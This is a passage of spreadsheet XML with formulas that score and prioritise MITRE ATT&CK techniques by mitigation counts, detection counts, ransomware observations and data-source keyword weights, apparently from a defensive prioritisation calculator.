      <c r="P339" s="51">
        <v>0</v>
      </c>
      <c r="Q339" s="51">
        <v>0</v>
      </c>
      <c r="R339" s="52" t="s">
        <v>1368</v>
      </c>
      <c r="S339" s="51">
        <v>7</v>
      </c>
      <c r="T339" s="52" t="s">
        <v>1205</v>
      </c>
      <c r="U339" s="51">
        <v>6</v>
      </c>
      <c r="V339" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.12380952380952381</v>
      </c>
      <c r="W339">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>13</v>
      </c>
      <c r="X339">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Y339">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Z339">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA339">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB339">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC339" s="29" t="s">
        <v>1369</v>
      </c>
      <c r="AD339" s="25" t="str" cm="1">
        <f t="array" ref="AD339">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC339)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE339" s="25">
        <f>IF(AD339="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF339" s="25" t="str" cm="1">
        <f t="array" ref="AF339">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC339)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG339" s="25">
        <f>IF(AF339="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH339" s="25" t="str" cm="1">
        <f t="array" ref="AH339">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC339)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI339" s="25">
        <f>IF(AH339="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ339" s="25" t="str" cm="1">
        <f t="array" ref="AJ339">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC339)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK339" s="25">
        <f>IF(AJ339="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL339" s="25" t="str" cm="1">
        <f t="array" ref="AL339">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC339)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM339" s="25">
        <f>IF(AL339="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN339" s="60">
        <v>0</v>
      </c>
      <c r="AO339" s="51">
        <v>0</v>
      </c>
      <c r="AP339" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.9766666666666667E-2</v>
      </c>
      <c r="AQ339" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.9222222222222226E-2</v>
      </c>
      <c r="AR339" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>9.9222222222222226E-2</v>
      </c>
      <c r="AS339" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT339" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU33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40" spans="1:47" ht="32.1">
      <c r="A340" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.238095238095238E-2</v>
      </c>
      <c r="B340" s="25">
        <f>SUM(H340,M340,V340)*(1+SUM(AE340,AG340,AI340,AK340,AM340))</f>
        <v>0.22380952380952382</v>
      </c>
      <c r="C340" s="25" t="s">
        <v>1370</v>
      </c>
      <c r="D340" s="25" t="s">
        <v>401</v>
      </c>
      <c r="E340" s="25" t="s">
        <v>1371</v>
      </c>
      <c r="F340" s="51">
        <v>1</v>
      </c>
      <c r="G340" s="51">
        <v>1</v>
      </c>
      <c r="H340" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I340">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J340">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K340">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L340">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M340" s="25">
        <v>0</v>
      </c>
      <c r="N340" s="51">
        <v>0</v>
      </c>
      <c r="O340" s="51">
        <v>0</v>
      </c>
      <c r="P340" s="51">
        <v>0</v>
      </c>
      <c r="Q340" s="51">
        <v>0</v>
      </c>
      <c r="R340" s="52" t="s">
        <v>1372</v>
      </c>
      <c r="S340" s="51">
        <v>2</v>
      </c>
      <c r="T340" s="52" t="s">
        <v>1373</v>
      </c>
      <c r="U340" s="51">
        <v>11</v>
      </c>
      <c r="V340" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.12380952380952381</v>
      </c>
      <c r="W340">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>13</v>
      </c>
      <c r="X340">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Y340">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Z340">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA340">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB340">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC340" s="29" t="s">
        <v>467</v>
      </c>
      <c r="AD340" s="25" t="str" cm="1">
        <f t="array" ref="AD340">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC340)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE340" s="25">
        <f>IF(AD340="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF340" s="25" t="str" cm="1">
        <f t="array" ref="AF340">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC340)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG340" s="25">
        <f>IF(AF340="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH340" s="25" t="str" cm="1">
        <f t="array" ref="AH340">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC340)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI340" s="25">
        <f>IF(AH340="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ340" s="25" t="str" cm="1">
        <f t="array" ref="AJ340">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC340)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK340" s="25">
        <f>IF(AJ340="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL340" s="25" t="str" cm="1">
        <f t="array" ref="AL340">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC340)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM340" s="25">
        <f>IF(AL340="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN340" s="60">
        <v>0</v>
      </c>
      <c r="AO340" s="51">
        <v>0</v>
      </c>
      <c r="AP340" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.238095238095238E-2</v>
      </c>
      <c r="AQ340" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.4603174603174602E-2</v>
      </c>
      <c r="AR340" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.4603174603174602E-2</v>
      </c>
      <c r="AS340" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT340" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU34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41" spans="1:47" ht="32.1">
      <c r="A341" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.238095238095238E-2</v>
      </c>
      <c r="B341" s="25">
        <f>SUM(H341,M341,V341)*(1+SUM(AE341,AG341,AI341,AK341,AM341))</f>
        <v>0.22380952380952379</v>
      </c>
      <c r="C341" s="25" t="s">
        <v>1374</v>
      </c>
      <c r="D341" s="25" t="s">
        <v>1375</v>
      </c>
      <c r="E341" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F341" s="51">
        <v>1</v>
      </c>
      <c r="G341" s="51">
        <v>1</v>
      </c>
      <c r="H341" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I341">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J341">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K341">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L341">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M341" s="25">
        <v>0</v>
      </c>
      <c r="N341" s="51">
        <v>0</v>
      </c>
      <c r="O341" s="51">
        <v>0</v>
      </c>
      <c r="P341" s="51">
        <v>0</v>
      </c>
      <c r="Q341" s="51">
        <v>2</v>
      </c>
      <c r="R341" s="52" t="s">
        <v>1368</v>
      </c>
      <c r="S341" s="51">
        <v>7</v>
      </c>
      <c r="T341" s="52" t="s">
        <v>1376</v>
      </c>
      <c r="U341" s="51">
        <v>5</v>
      </c>
      <c r="V341" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.1238095238095238</v>
      </c>
      <c r="W341">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>12</v>
      </c>
      <c r="X341">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.21818181818181817</v>
      </c>
      <c r="Y341">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.21818181818181817</v>
      </c>
      <c r="Z341">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA341">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB341">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC341" s="29" t="s">
        <v>913</v>
      </c>
      <c r="AD341" s="25" t="str" cm="1">
        <f t="array" ref="AD341">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC341)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE341" s="25">
        <f>IF(AD341="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF341" s="25" t="str" cm="1">
        <f t="array" ref="AF341">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC341)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG341" s="25">
        <f>IF(AF341="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH341" s="25" t="str" cm="1">
        <f t="array" ref="AH341">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC341)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI341" s="25">
        <f>IF(AH341="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ341" s="25" t="str" cm="1">
        <f t="array" ref="AJ341">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC341)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK341" s="25">
        <f>IF(AJ341="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL341" s="25" t="str" cm="1">
        <f t="array" ref="AL341">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC341)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM341" s="25">
        <f>IF(AL341="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN341" s="60">
        <v>0</v>
      </c>
      <c r="AO341" s="51">
        <v>0</v>
      </c>
      <c r="AP341" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.238095238095238E-2</v>
      </c>
      <c r="AQ341" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.4603174603174602E-2</v>
      </c>
      <c r="AR341" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.4603174603174602E-2</v>
      </c>
      <c r="AS341" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT341" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU34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42" spans="1:47" ht="32.1">
      <c r="A342" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.9133333333333337E-2</v>
      </c>
      <c r="B342" s="25">
        <f>SUM(H342,M342,V342)*(1+SUM(AE342,AG342,AI342,AK342,AM342))</f>
        <v>0.29133333333333339</v>
      </c>
      <c r="C342" s="25" t="s">
        <v>1377</v>
      </c>
      <c r="D342" s="25" t="s">
        <v>1354</v>
      </c>
      <c r="E342" s="25" t="s">
        <v>1378</v>
      </c>
      <c r="F342" s="51">
        <v>1</v>
      </c>
      <c r="G342" s="51">
        <v>1</v>
      </c>
      <c r="H342" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I342">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J342">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K342">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L342">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M342" s="25">
        <v>0</v>
      </c>
      <c r="N342" s="51">
        <v>0</v>
      </c>
      <c r="O342" s="51">
        <v>0</v>
      </c>
      <c r="P342" s="51">
        <v>3</v>
      </c>
      <c r="Q342" s="51">
        <v>0</v>
      </c>
      <c r="R342" s="52" t="s">
        <v>1355</v>
      </c>
      <c r="S342" s="51">
        <v>3</v>
      </c>
      <c r="T342" s="52" t="s">
        <v>1356</v>
      </c>
      <c r="U342" s="51">
        <v>8</v>
      </c>
      <c r="V342" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.11904761904761907</v>
      </c>
      <c r="W342">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>11</v>
      </c>
      <c r="X342">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.2</v>
      </c>
      <c r="Y342">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.2</v>
      </c>
      <c r="Z342">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA342">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB342">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC342" s="29" t="s">
        <v>163</v>
      </c>
      <c r="AD342" s="25" t="str" cm="1">
        <f t="array" ref="AD342">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC342)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE342" s="25">
        <f>IF(AD342="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF342" s="25" t="str" cm="1">
        <f t="array" ref="AF342">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC342)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG342" s="25">
        <f>IF(AF342="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH342" s="25" t="str" cm="1">
        <f t="array" ref="AH342">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC342)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI342" s="25">
        <f>IF(AH342="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ342" s="25" t="str" cm="1">
        <f t="array" ref="AJ342">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC342)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK342" s="25">
        <f>IF(AJ342="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL342" s="25" t="str" cm="1">
        <f t="array" ref="AL342">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC342)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM342" s="25">
        <f>IF(AL342="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN342" s="60">
        <v>0</v>
      </c>
      <c r="AO342" s="51">
        <v>0</v>
      </c>
      <c r="AP342" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.9133333333333337E-2</v>
      </c>
      <c r="AQ342" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.7111111111111134E-2</v>
      </c>
      <c r="AR342" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>9.7111111111111134E-2</v>
      </c>
      <c r="AS342" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT342" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU34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43" spans="1:47">
      <c r="A343" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.8129523809523811E-2</v>
      </c>
      <c r="B343" s="25">
        <f>SUM(H343,M343,V343)*(1+SUM(AE343,AG343,AI343,AK343,AM343))</f>
        <v>0.2479619047619048</v>
      </c>
      <c r="C343" s="25" t="s">
        <v>1379</v>
      </c>
      <c r="D343" s="25" t="s">
        <v>143</v>
      </c>
      <c r="E343" s="25" t="s">
        <v>1380</v>
      </c>
      <c r="F343" s="51">
        <v>1</v>
      </c>
      <c r="G343" s="51">
        <v>1</v>
      </c>
      <c r="H343" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I343">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J343">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K343">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L343">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M343" s="25">
        <v>0</v>
      </c>
      <c r="N343" s="51">
        <v>0</v>
      </c>
      <c r="O343" s="51">
        <v>0</v>
      </c>
      <c r="P343" s="51">
        <v>1</v>
      </c>
      <c r="Q343" s="51">
        <v>0</v>
      </c>
      <c r="R343" s="52" t="s">
        <v>1381</v>
      </c>
      <c r="S343" s="51">
        <v>4</v>
      </c>
      <c r="T343" s="51" t="s">
        <v>1382</v>
      </c>
      <c r="U343" s="51">
        <v>8</v>
      </c>
      <c r="V343" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.11904761904761904</v>
      </c>
      <c r="W343">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>12</v>
      </c>
      <c r="X343">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.21818181818181817</v>
      </c>
      <c r="Y343">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.21818181818181817</v>
      </c>
      <c r="Z343">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA343">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB343">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC343" s="29" t="s">
        <v>1383</v>
      </c>
      <c r="AD343" s="25" t="str" cm="1">
        <f t="array" ref="AD343">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC343)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE343" s="25">
        <f>IF(AD343="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
